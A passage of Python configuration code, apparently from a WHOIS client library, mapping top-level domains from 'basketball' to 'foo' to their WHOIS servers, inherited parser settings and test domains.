\"nic.basketball\"}\nZZ[\"bauhaus\"] = {\"_server\": \"whois.nic.bauhaus\", \"extend\": \"com\", \"_test\": \"nic.bauhaus\"}\nZZ[\"bayern\"] = {\"_server\": \"whois.nic.bayern\", \"extend\": \"com\", \"_test\": \"nic.bayern\"}\nZZ[\"bbc\"] = {\"_server\": \"whois.nic.bbc\", \"extend\": \"com\", \"_test\": \"nic.bbc\"}\nZZ[\"bbt\"] = {\"_server\": \"whois.nic.bbt\", \"extend\": \"com\", \"_test\": \"nic.bbt\"}\nZZ[\"bbva\"] = {\"_server\": \"whois.nic.bbva\", \"extend\": \"com\", \"_test\": \"nic.bbva\"}\nZZ[\"bcg\"] = {\"_server\": \"whois.nic.bcg\", \"extend\": \"com\", \"_test\": \"nic.bcg\"}\nZZ[\"bcn\"] = {\"_server\": \"whois.nic.bcn\", \"extend\": \"com\", \"_test\": \"nic.bcn\"}\nZZ[\"bd\"] = {\"extend\": \"_privateReg\"} # Bangladesh\nZZ[\"beats\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"beauty\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"beer\"] = {\"_server\": \"whois.nic.beer\", \"extend\": \"com\", \"_test\": \"nic.beer\"}\nZZ[\"bentley\"] = {\"_server\": \"whois.nic.bentley\", \"extend\": \"com\", \"_test\": \"nic.bentley\"}\nZZ[\"berlin\"] = {\"_server\": \"whois.nic.berlin\", \"extend\": \"com\", \"_test\": \"nic.berlin\"}\nZZ[\"bestbuy\"] = {\"_server\": \"whois.nic.bestbuy\", \"extend\": \"com\", \"_test\": \"nic.bestbuy\"}\nZZ[\"best\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"bet\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.bet\", \"_test\": \"nic.bet\"}\nZZ[\"bf\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.bf\", \"registrant\": R(r\"Registrant Name:\\s?(.+)\"), \"_test\": \"nic.bf\"}\nZZ[\"bible\"] = {\"_server\": \"whois.nic.bible\", \"extend\": \"com\", \"_test\": \"nic.bible\"}\nZZ[\"bid\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.bid\", \"_test\": \"nic.bid\"}\nZZ[\"bike\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"bingo\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"bio\"] = {\"_server\": \"whois.nic.bio\", \"extend\": \"com\", \"_test\": \"nic.bio\"}\nZZ[\"bi\"] = {\"_server\": \"whois1.nic.bi\", \"extend\": \"com\"}\nZZ[\"blackfriday\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"black\"] = {\"_server\": \"whois.nic.black\", \"extend\": \"com\", \"_test\": \"nic.black\"}\nZZ[\"blockbuster\"] = {\"_server\": \"whois.nic.blockbuster\", \"extend\": \"com\", \"_test\": \"nic.blockbuster\"}\nZZ[\"blog\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"blue\"] = {\"extend\": \"com\"}\nZZ[\"bms\"] = {\"_server\": \"whois.nic.bms\", \"extend\": \"com\", \"_test\": \"nic.bms\"}\nZZ[\"bmw\"] = {\"_server\": \"whois.nic.bmw\", \"extend\": \"com\", \"_test\": \"nic.bmw\"}\nZZ[\"bnpparibas\"] = {\"_server\": \"whois.nic.bnpparibas\", \"extend\": \"com\", \"_test\": \"group.bnpparibas\"}\nZZ[\"boats\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"boehringer\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"bofa\"] = {\"_server\": \"whois.nic.bofa\", \"extend\": \"com\", \"_test\": \"nic.bofa\"}\nZZ[\"bom\"] = {\"extend\": \"com\", \"_server\": \"whois.gtlds.nic.br\"}\nZZ[\"bond\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"book\"] = {\"_server\": \"whois.nic.book\", \"extend\": \"com\", \"_test\": \"nic.book\"}\nZZ[\"boo\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"bosch\"] = {\"_server\": \"whois.nic.bosch\", \"extend\": \"com\", \"_test\": \"nic.bosch\"}\nZZ[\"bostik\"] = {\"_server\": \"whois.nic.bostik\", \"extend\": \"com\", \"_test\": \"nic.bostik\"}\nZZ[\"boston\"] = {\"_server\": \"whois.nic.boston\", \"extend\": \"com\", \"_test\": \"nic.boston\"}\nZZ[\"bot\"] = {\"_server\": \"whois.nic.bot\", \"extend\": \"com\", \"_test\": \"nic.bot\"}\nZZ[\"boutique\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"box\"] = {\"_server\": \"whois.nic.box\", \"extend\": \"com\", \"_test\": \"nic.box\"}\nZZ[\"bradesco\"] = {\"_server\": \"whois.nic.bradesco\", \"extend\": \"com\", \"_test\": \"nic.bradesco\"}\nZZ[\"bridgestone\"] = {\"_server\": \"whois.nic.bridgestone\", \"extend\": \"com\", \"_test\": \"nic.bridgestone\"}\nZZ[\"broadway\"] = {\"_server\": \"whois.nic.broadway\", \"extend\": \"com\", \"_test\": \"nic.broadway\"}\nZZ[\"broker\"] = {\"_server\": \"whois.nic.broker\", \"extend\": \"com\", \"_test\": \"nic.broker\"}\nZZ[\"brother\"] = {\"_server\": \"whois.nic.brother\", \"extend\": \"com\", \"_test\": \"nic.brother\"}\nZZ[\"brussels\"] = {\"_server\": \"whois.nic.brussels\", \"extend\": \"com\", \"_test\": \"nic.brussels\"}\nZZ[\"builders\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"build\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"business\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"buy\"] = {\"_server\": \"whois.nic.buy\", \"extend\": \"com\", \"_test\": \"nic.buy\"}\nZZ[\"buzz\"] = {\"extend\": \"amsterdam\"}\nZZ[\"bz\"] = {\"extend\": \"_privateReg\"}\nZZ[\"cab\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ca\"] = {\"extend\": \"com\"}\nZZ[\"cafe\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"call\"] = {\"_server\": \"whois.nic.call\", \"extend\": \"com\", \"_test\": \"nic.call\"}\nZZ[\"cal\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"camera\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cam\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"camp\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"canon\"] = {\"_server\": \"whois.nic.canon\", \"extend\": \"com\", \"_test\": \"nic.canon\"}\nZZ[\"capetown\"] = {\"_server\": \"whois.nic.capetown\", \"extend\": \"com\", \"_test\": \"nic.capetown\"}\nZZ[\"capital\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"capitalone\"] = {\"_server\": \"whois.nic.capitalone\", \"extend\": \"com\", \"_test\": \"nic.capitalone\"}\nZZ[\"cards\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"career\"] = {\"_server\": \"whois.nic.career\", \"extend\": \"com\", \"_test\": \"nic.career\"}\nZZ[\"careers\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"care\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"car\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cars\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"casa\"] = {\"extend\": \"ac\", \"registrant_country\": R(r\"Registrant Country:\\s+(.+)\")}\nZZ[\"case\"] = {\"_server\": \"whois.nic.case\", \"extend\": \"com\", \"_test\": \"nic.case\"}\nZZ[\"cash\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"casino\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"catering\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cat\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.cat\", \"_test\": \"nic.cat\"}\nZZ[\"catholic\"] = {\"_server\": \"whois.nic.catholic\", \"extend\": \"com\", \"_test\": \"nic.catholic\"}\nZZ[\"ca.ug\"] = {\"extend\": \"ug\"}\nZZ[\"cba\"] = {\"_server\": \"whois.nic.cba\", \"extend\": \"com\", \"_test\": \"nic.cba\"}\nZZ[\"cbs\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"cd\"] = {\"extend\": \"ac\", \"_server\": \"whois.nic.cd\", \"registrant_country\": R(r\"Registrant\\s+Country:\\s+(.+)\"), \"_test\": \"nic.cd\"}\nZZ[\"center\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ceo\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cern\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"cfa\"] = {\"_server\": \"whois.nic.cfa\", \"extend\": \"com\", \"_test\": \"nic.cfa\"}\nZZ[\"cfd\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"chanel\"] = {\"_server\": \"whois.nic.chanel\", \"extend\": \"com\", \"_test\": \"nic.chanel\"}\nZZ[\"channel\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"charity\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.nic.charity\", \"_test\": \"nic.charity\"}\nZZ[\"chat\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cheap\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ch\"] = {\"extend\": \"_privateReg\"}\nZZ[\"chintai\"] = {\"_server\": \"whois.nic.chintai\", \"extend\": \"com\", \"_test\": \"nic.chintai\"}\nZZ[\"christmas\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"chrome\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"church\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cipriani\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"circle\"] = {\"_server\": \"whois.nic.circle\", \"extend\": \"com\", \"_test\": \"nic.circle\"}\nZZ[\"ci\"] = {\"_server\": \"whois.nic.ci\", \"extend\": \"com\", \"_test\": \"nic.ci\"}\nZZ[\"cityeats\"] = {\"_server\": \"whois.nic.cityeats\", \"extend\": \"com\", \"_test\": \"nic.cityeats\"}\nZZ[\"city\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"claims\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cleaning\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"click\"] = {\"extend\": \"com\"}\nZZ[\"clinic\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"clinique\"] = {\"_server\": \"whois.nic.clinique\", \"extend\": \"com\", \"_test\": \"nic.clinique\"}\nZZ[\"clothing\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cloud\"] = {\"extend\": \"com\"}\nZZ[\"club\"] = {\"extend\": \"com\"}\nZZ[\"clubmed\"] = {\"_server\": \"whois.nic.clubmed\", \"extend\": \"com\", \"_test\": \"nic.clubmed\"}\nZZ[\"cm\"] = {\"extend\": \"com\"}\nZZ[\"coach\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"codes\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"co\"] = {\"extend\": \"biz\", \"status\": R(r\"Status:\\s?(.+)\")}\nZZ[\"coffee\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"co.ke\"] = {\"extend\": \"ke\"}\nZZ[\"college\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cologne\"] = {\"_server\": \"whois.ryce-rsp.com\", \"extend\": \"com\"}\nZZ[\"com.au\"] = {\"extend\": \"au\"}\nZZ[\"com.bd\"] = {\"extend\": \"bd\"}\nZZ[\"com.bo\"] = {\"extend\": \"bo\"}\nZZ[\"comcast\"] = {\"_server\": \"whois.nic.comcast\", \"extend\": \"com\", \"_test\": \"nic.comcast\"}\nZZ[\"com.cn\"] = {\"extend\": \"cn\"}\nZZ[\"com.do\"] = {\"extend\": \"_privateReg\"}\nZZ[\"com.ec\"] = {\"extend\": \"ec\"}\nZZ[\"com.eg\"] = {\"extend\": \"_privateReg\"} # Egipt\nZZ[\"com.ly\"] = {\"extend\": \"ly\"}\nZZ[\"commbank\"] = {\"_server\": \"whois.nic.commbank\", \"extend\": \"com\", \"_test\": \"nic.commbank\"}\nZZ[\"com.mo\"] = {\"extend\": \"mo\"}\nZZ[\"community\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"com.np\"] = {\"extend\": \"np\"}\nZZ[\"company\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"compare\"] = {\"_server\": \"whois.nic.compare\", \"extend\": \"com\", \"_test\": \"nic.compare\"}\nZZ[\"com.ph\"] = {\"extend\": \"ph\"}\nZZ[\"computer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"com.py\"] = {\"extend\": \"_privateReg\"}\nZZ[\"com.ru\"] = {\"extend\": \"ru\", \"_server\": \"whois.nic.ru\", \"_test\": \"mining.com.ru\"}\nZZ[\"comsec\"] = {\"_server\": \"whois.nic.comsec\", \"extend\": \"com\", \"_test\": \"nic.comsec\"}\nZZ[\"com.tm\"] = {\"extend\": \"tm\", \"_privateRegistry\": True}\nZZ[\"com.tw\"] = {\"extend\": \"tw\"}\nZZ[\"com.ua\"] = {\"extend\": \"ua\"}\nZZ[\"com.ve\"] = {\"extend\": \"ve\"}\nZZ[\"com.zw\"] = {\"extend\": \"zw\"}\nZZ[\"condos\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"construction\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"consulting\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"contact\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"contractors\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cooking\"] = {\"_server\": \"whois.nic.cooking\", \"extend\": \"com\", \"_test\": \"nic.cooking\"}\nZZ[\"cool\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"coop\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"coop.rw\"] = {\"extend\": \"rw\"}\nZZ[\"corsica\"] = {\"_server\": \"whois.nic.corsica\", \"extend\": \"com\", \"_test\": \"nic.corsica\"}\nZZ[\"co.rw\"] = {\"extend\": \"rw\"}\nZZ[\"co.ug\"] = {\"extend\": \"ug\"}\nZZ[\"country\"] = {\"_server\": \"whois.nic.country\", \"extend\": \"com\", \"_test\": \"nic.country\"}\nZZ[\"coupons\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"courses\"] = {\"extend\": \"com\"}\nZZ[\"co.ve\"] = {\"extend\": \"ve\"}\nZZ[\"co.za\"] = {\"extend\": \"za\", \"_server\": \"coza-whois.registry.net.za\"}\nZZ[\"cpa\"] = {\"_server\": \"whois.nic.cpa\", \"extend\": \"com\", \"_test\": \"nic.cpa\"}\nZZ[\"creditcard\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"credit\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"creditunion\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\n\nZZ[\"cr\"] = {\"extend\": \"cz\"}\nZZ[\"co.cr\"] = {\"extend\": \"cr\"}\n\nZZ[\"cricket\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.cricket\", \"_test\": \"nic.cricket\"}\nZZ[\"cruise\"] = {\"_server\": \"whois.nic.cruise\", \"extend\": \"com\", \"_test\": \"nic.cruise\"}\nZZ[\"cruises\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"cuisinella\"] = {\"_server\": \"whois.nic.cuisinella\", \"extend\": \"com\", \"_test\": \"nic.cuisinella\"}\nZZ[\"cv\"] = {\"extend\": \"_privateReg\"} # Cape Verde\nZZ[\"cw\"] = {\"extend\": \"_privateReg\"}\nZZ[\"cx\"] = {\"extend\": \"com\"}\nZZ[\"cymru\"] = {\"_server\": \"whois.nic.cymru\", \"extend\": \"com\", \"_test\": \"nic.cymru\"}\nZZ[\"cyou\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"cy\"] = {\"_privateRegistry\": True}\nZZ[\"dabur\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"dad\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"dance\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"data\"] = {\"_server\": \"whois.nic.data\", \"extend\": \"com\", \"_test\": \"nic.data\"}\nZZ[\"date\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.date\", \"_test\": \"nic.date\"}\nZZ[\"dating\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"datsun\"] = {\"_server\": \"whois.nic.gmo\", \"extend\": \"com\"}\nZZ[\"day\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"dclk\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"dds\"] = {\"_server\": \"whois.nic.dds\", \"extend\": \"com\", \"_test\": \"nic.dds\"}\nZZ[\"dealer\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"deal\"] = {\"_server\": \"whois.nic.deal\", \"extend\": \"com\", \"_test\": \"nic.deal\"}\nZZ[\"deals\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"degree\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"delivery\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"deloitte\"] = {\"_server\": \"whois.nic.deloitte\", \"extend\": \"com\", \"_test\": \"nic.deloitte\"}\nZZ[\"delta\"] = {\"_server\": \"whois.nic.delta\", \"extend\": \"com\", \"_test\": \"nic.delta\"}\nZZ[\"democrat\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dental\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dentist\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"desi\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"design\"] = {\"extend\": \"ac\"}\nZZ[\"dev\"] = {\"extend\": \"com\"}\nZZ[\"diamonds\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"diet\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"digital\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"direct\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"directory\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"discount\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dish\"] = {\"_server\": \"whois.nic.dish\", \"extend\": \"com\", \"_test\": \"nic.dish\"}\nZZ[\"diy\"] = {\"_server\": \"whois.nic.diy\", \"extend\": \"com\", \"_test\": \"nic.diy\"}\nZZ[\"dm\"] = {\"_server\": \"whois.dmdomains.dm\", \"extend\": \"com\"}\nZZ[\"dnp\"] = {\"_server\": \"whois.nic.dnp\", \"extend\": \"com\", \"_test\": \"nic.dnp\"}\nZZ[\"docs\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"doctor\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"do\"] = {\"extend\": \"bzh\", \"_server\": \"whois.nic.do\", \"_test\": \"nic.do\"}\nZZ[\"do\"] = {\"extend\": \"_privateReg\"}\nZZ[\"dog\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"domains\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"dot\"] = {\"_server\": \"whois.nic.dot\", \"extend\": \"com\", \"_test\": \"nic.dot\"}\nZZ[\"download\"] = {\"extend\": \"amsterdam\", \"name_servers\": R(r\"Name Server:[ \\t]+(\\S+)\"), \"status\": R(r\"Domain Status:\\s*([a-zA-z]+)\")}\nZZ[\"drive\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"dtv\"] = {\"_server\": \"whois.nic.dtv\", \"extend\": \"com\", \"_test\": \"nic.dtv\"}\nZZ[\"dubai\"] = {\"_server\": \"whois.nic.dubai\", \"extend\": \"com\", \"_test\": \"nic.dubai\"}\nZZ[\"duckdns.org\"] = {\"extend\": \"_privateReg\"}\nZZ[\"dunlop\"] = {\"_server\": \"whois.nic.dunlop\", \"extend\": \"com\", \"_test\": \"nic.dunlop\"}\nZZ[\"durban\"] = {\"_server\": \"whois.nic.durban\", \"extend\": \"com\", \"_test\": \"nic.durban\"}\nZZ[\"dvag\"] = {\"_server\": \"whois.nic.dvag\", \"extend\": \"com\", \"_test\": \"nic.dvag\"}\nZZ[\"dvr\"] = {\"_server\": \"whois.nic.dvr\", \"extend\": \"com\", \"_test\": \"nic.dvr\"}\nZZ[\"dz\"] = {\"extend\": \"_privateReg\"}\nZZ[\"earth\"] = {\"_server\": \"whois.nic.earth\", \"extend\": \"com\", \"_test\": \"nic.earth\"}\nZZ[\"eat\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"ec\"] = {\"extend\": \"_privateReg\"}\nZZ[\"eco\"] = {\"_server\": \"whois.nic.eco\", \"extend\": \"com\", \"_test\": \"nic.eco\"}\nZZ[\"edeka\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"ed.jp\"] = {\"extend\": \"co.jp\"}\nZZ[\"education\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"edu.tr\"] = {\"extend\": \"com.tr\", \"_server\": \"whois.trabis.gov.tr\", \"_test\": \"anadolu.edu.tr\"}\nZZ[\"edu.ua\"] = {\"extend\": \"ua\", \"creation_date\": R(r\"\\ncreated:\\s+0-UANIC\\s+(.+)\")}\nZZ[\"eg\"] = {\"extend\": \"_privateReg\"} # Egipt\nZZ[\"email\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"emerck\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"energy\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"engineer\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"engineering\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"enterprises\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"epson\"] = {\"_server\": \"whois.nic.epson\", \"extend\": \"com\", \"_test\": \"nic.epson\"}\nZZ[\"equipment\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"ericsson\"] = {\"_server\": \"whois.nic.ericsson\", \"extend\": \"com\", \"_test\": \"nic.ericsson\"}\nZZ[\"erni\"] = {\"_server\": \"whois.nic.erni\", \"extend\": \"com\", \"_test\": \"nic.erni\"}\nZZ[\"es\"] = {\"extend\": \"_privateReg\"}\nZZ[\"esq\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.google\"}\nZZ[\"estate\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"et\"] = {\"extend\": \"com\", \"_server\": \"whois.ethiotelecom.et\"}\nZZ[\"com.et\"] = {\"extend\": \"et\", \"_test\": \"google.com.et\"}\nZZ[\"etisalat\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"eurovision\"] = {\"_server\": \"whois.nic.eurovision\", \"extend\": \"com\", \"_test\": \"nic.eurovision\"}\nZZ[\"eus\"] = {\"extend\": \"ac\"}\nZZ[\"events\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"exchange\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"expert\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"exposed\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"express\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"extraspace\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"fage\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"fail\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fairwinds\"] = {\"_server\": \"whois.nic.fairwinds\", \"extend\": \"com\", \"_test\": \"nic.fairwinds\"}\nZZ[\"faith\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.faith\", \"_test\": \"nic.faith\"}\nZZ[\"family\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fan\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fans\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"farm\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fashion\"] = {\"extend\": \"com\", \"_server\": \"whois.nic.fashion\", \"_test\": \"nic.fashion\"}\nZZ[\"fast\"] = {\"_server\": \"whois.nic.fast\", \"extend\": \"com\", \"_test\": \"nic.fast\"}\nZZ[\"fedex\"] = {\"_server\": \"whois.nic.fedex\", \"extend\": \"com\", \"_test\": \"nic.fedex\"}\nZZ[\"feedback\"] = {\"extend\": \"_centralnic\", \"_server\": \"whois.centralnic.com\"}\nZZ[\"ferrari\"] = {\"_server\": \"whois.nic.ferrari\", \"extend\": \"com\", \"_test\": \"nic.ferrari\"}\nZZ[\"fidelity\"] = {\"_server\": \"whois.nic.fidelity\", \"extend\": \"com\", \"_test\": \"nic.fidelity\"}\nZZ[\"fido\"] = {\"_server\": \"whois.afilias-srs.net\", \"extend\": \"com\"}\nZZ[\"film\"] = {\"_server\": \"whois.nic.film\", \"extend\": \"com\", \"_test\": \"nic.film\"}\nZZ[\"final\"] = {\"_server\": \"whois.gtlds.nic.br\", \"extend\": \"bom\"}\nZZ[\"finance\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"financial\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fire\"] = {\"_server\": \"whois.nic.fire\", \"extend\": \"com\", \"_test\": \"nic.fire\"}\nZZ[\"firestone\"] = {\"_server\": \"whois.nic.firestone\", \"extend\": \"com\", \"_test\": \"nic.firestone\"}\nZZ[\"firmdale\"] = {\"_server\": \"whois.nic.firmdale\", \"extend\": \"com\", \"_test\": \"nic.firmdale\"}\nZZ[\"fish\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"fishing\"] = {\"_server\": \"whois.nic.fishing\", \"extend\": \"com\", \"_test\": \"nic.fishing\"}\nZZ[\"fit\"] = {\"extend\": \"com\"}\nZZ[\"fitness\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"flights\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"florist\"] = {\"extend\": \"_donuts\", \"_server\": \"whois.donuts.co\"}\nZZ[\"flowers\"] = {\"extend\": \"_uniregistry\", \"_server\": \"whois.uniregistry.net\"}\nZZ[\"fly\"] = {\"_server\": \"whois.nic.google\", \"extend\": \"com\"}\nZZ[\"fm\"] = {\"extend\": \"com\"}\nZZ[\"fo\"] = {\"extend\": \"com\", \"registrant\": None}\nZZ[\"foo\"] = {\"extend\": \"com\", \"_server\": 